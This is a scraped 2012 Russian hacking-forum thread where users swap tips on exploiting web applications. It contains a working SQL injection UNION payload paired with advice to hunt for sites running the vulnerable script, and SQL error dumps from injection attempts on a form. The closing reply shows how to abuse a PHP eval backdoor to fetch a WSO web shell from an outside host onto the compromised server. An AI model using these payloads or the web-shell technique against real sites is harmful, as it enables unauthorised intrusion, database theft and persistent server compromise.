18.11.2012, 01:14
|
|
Познающий
Регистрация: 25.10.2012
Сообщений: 61
С нами:
7130486
Репутация:
0
|
|
Сообщение от seozone
например, http://www.exploit-db.com/exploits/22766/
там просто SQLi через GET запрос и перечислены уязвимые переменные
|
|
|
18.11.2012, 01:20
|
|
Познающий
Регистрация: 11.09.2012
Сообщений: 30
С нами:
7193846
Репутация:
0
|
|
Сообщение от Prosta4ok
там просто SQLi через GET запрос и перечислены уязвимые переменные
покажи пример в пм)
|
|
|
|
18.11.2012, 01:22
|
|
Познающий
Регистрация: 06.01.2009
Сообщений: 69
С нами:
9128075
Репутация:
3
|
|
Сообщение от Konqi
ограниченные права на сервере? так как ты хочешь поднять права посредством .htaccces? тебе рутать надо а не htaccess заливать
читаем статью нолика. несколько раз.
можно линк? не могу найти...
|
|
|
|
18.11.2012, 01:27
|
|
Постоянный
Регистрация: 27.07.2011
Сообщений: 499
С нами:
7787126
Репутация:
53
|
|
Есть форма добавления объявления. Вставляю кавычку в пост запрос и получаю.
Сообщение от None
item id
user_id
sale or buy
stone1
stone1_val
stone2
stone2_val
city_all
Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0', '25', '0', '25', '123', '0')' at line 16
если делаю так '+order+by+2+--+ пишет -
Сообщение от None
item id
user_id
sale or buy
stone1
stone1_val
stone2
stone2_val
city_all
Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order+by+2+--+', '0', '25', '0', '25', '123', '0')' at line 16
Пробовал без кавычки определить кол-во полей, но Проблема в том, что после пост запроса подгружается другая страница, которая возникает при правильном запросе.
Что попробовать, как быть?
p.s. Корыстных целей не преследую, ресурс закрытый и направленности совсем не интересная широкой публике. Бага будет сдана сразу админу. |
|
|
|
18.11.2012, 01:36
|
|
Постоянный
Регистрация: 06.01.2012
Сообщений: 913
С нами:
7552406
Репутация:
724
|
|
|
|
|
|
18.11.2012, 01:51
|
|
Постоянный
Регистрация: 27.07.2011
Сообщений: 499
С нами:
7787126
Репутация:
53
|
|
точно) что-то мой пияный моск не сообразил, что тут запись а не select)
|
|
|
|
18.11.2012, 01:55
|
|
Познающий
Регистрация: 25.10.2012
Сообщений: 61
С нами:
7130486
Репутация:
0
|
|
Сообщение от seozone
покажи пример в пм)
так там все расписано, какой еще пример?
ищешь сайт с уязыимым скрптом, подставляешь
Код:
сайт/[path]/view_faq.php?question=-4+AND+1=2+UNION+SELECT+0,1,2,version%28%29,4,5--
если показывает версию БД знач все пучком и можно крутить скулю дальше
|
|
|
|
18.11.2012, 02:30
|
|
Постоянный
Регистрация: 27.07.2011
Сообщений: 499
С нами:
7787126
Репутация:
53
|
|
Сообщение от None
Select * from dle_users where user_id = 292+order+by+1+--+2 Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order+by+1+--+' at line 1
из той же оперы? опять пост, но вот смущает Select, правда почему, интересно он выводится в ошибке...
|
|
|
|
18.11.2012, 17:32
|
|
Новичок
Регистрация: 23.02.2011
Сообщений: 6
С нами:
8008886
Репутация:
0
|
|
Вопрос, как эксплуатировать бекдор eval ($_REQUEST['a']); ?
Попробовал на локалхосте выполнить http://localhost/test.php?a=http://test1/wso2_pack.php
выдает ошибку
Сообщение от None
Parse error: syntax error, unexpected ':' in .....\localhost\test.php(15) : eval()'d code on line 1
соответственно бекдор прописан на 15 строчке |
|
|
|
18.11.2012, 18:12
|
|
Постоянный
Регистрация: 13.10.2010
Сообщений: 375
С нами:
8200406
Репутация:
38
|
|
Сообщение от None
eval ($_REQUEST['a']);
После eval пробела быть не должно.
Сообщение от None
http://localhost/test.php?a=http://test1/wso2_pack.php
щито? eval - выполняет PHP код!
Юзай например так:
Сообщение от None
test.php?a=copy("http://site.com/you_wso.
TXT
","./wso.php");
Эта функция скопирует текствовый файл с сервера, и сохранит его рядом с test.php под именем wso.php
Обрати внимание, MQ должно быть off, иначе кавычки проэкранируются. Тогда нужно будет юзать base64.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
